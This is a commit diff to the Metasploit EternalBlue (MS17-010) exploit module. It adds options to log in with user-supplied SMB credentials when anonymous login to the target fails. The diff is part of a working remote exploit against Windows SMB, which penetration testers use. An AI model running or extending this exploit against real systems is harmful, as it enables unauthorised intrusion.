added credentialed fallback

if anonymous login is blocked, then the user can
supply credentials for the exploit to try as a fallback

Author: David Maloney

modules/exploits/windows/smb/ms17_010_eternalblue.rb

@@ -5,6 +5,7 @@
 
 require 'ruby_smb'
 require 'ruby_smb/smb1/packet'
+require 'windows_error'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GoodRanking
@@ -27,13 +28,19 @@ def initialize(info = {})
         This exploit, like the original may not trigger 100% of the time, and should be
         run continuously until triggered. It seems like the pool will get hot streaks
         and need a cool down period before the shells rain in again.
+
+        The module will attempt to use Anonymous login to authenticate to perform the
+        exploit. If Anonymous login fails and credentials have been supplied via the
+        SMBUser, SMBPass, and SMBDomain datastore options, then it will try the exploit
+        again with those credentials.
       },
 
       'Author'         => [
         'Sean Dillon <[email protected]>',  # @zerosum0x0
         'Dylan Davis <[email protected]>',  # @jennamagius
         'Equation Group',
-        'Shadow Brokers'
+        'Shadow Brokers',
+        'thelightcosine'  # RubySMB refactor and Fallback Credential mode
        ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -85,7 +92,10 @@ def initialize(info = {})
         OptInt.new( 'GroomAllocations', [ true,  "Initial number of times to groom the kernel pool.", 12 ] ),
         OptInt.new( 'GroomDelta', [ true,  "The amount to increase the groom count by per try.", 5 ] ),
         OptBool.new( 'VerifyTarget', [ true,  "Check if remote OS matches exploit Target.", true ] ),
-        OptBool.new( 'VerifyArch', [ true,  "Check if remote architecture matches exploit Target.", true ] )
+        OptBool.new( 'VerifyArch', [ true,  "Check if remote architecture matches exploit Target.", true ] ),
+        OptString.new('SMBUser', [ false, '(Fallback) The username to authenticate as', '']),
+        OptString.new('SMBPass', [ false, '(Fallback) The password for the specified username', '']),
+        OptString.new('SMBDomain',  [ false, '(Fallback) The Windows domain to use for authentication', '.']),
       ])
   end
 
@@ -283,7 +293,27 @@ def smb1_anonymous_connect_ipc()
     sock = connect(false)
     dispatcher = RubySMB::Dispatcher::Socket.new(sock)
     client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
-    client.login
+    response_code = client.login
+
+    unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
+      if datastore['SMBUser'].present? && datastore['SMBPass'].present?
+        client = RubySMB::Client.new(
+          dispatcher,
+          smb1: true,
+          smb2: false,
+          username: datastore['SMBUser'],
+          password: datastore['SMBPass'],
+          domain: datastore['SMBDomain']
+        )
+        response_code = client.login
+
+        unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
+          raise RubySMB::Error::UnexpectedStatusCode, "Error with credentialed login: #{response_code.to_s}"
+        end
+      else
+        raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login: #{response_code.to_s}"
+      end
+    end
     os = client.peer_native_os
     tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")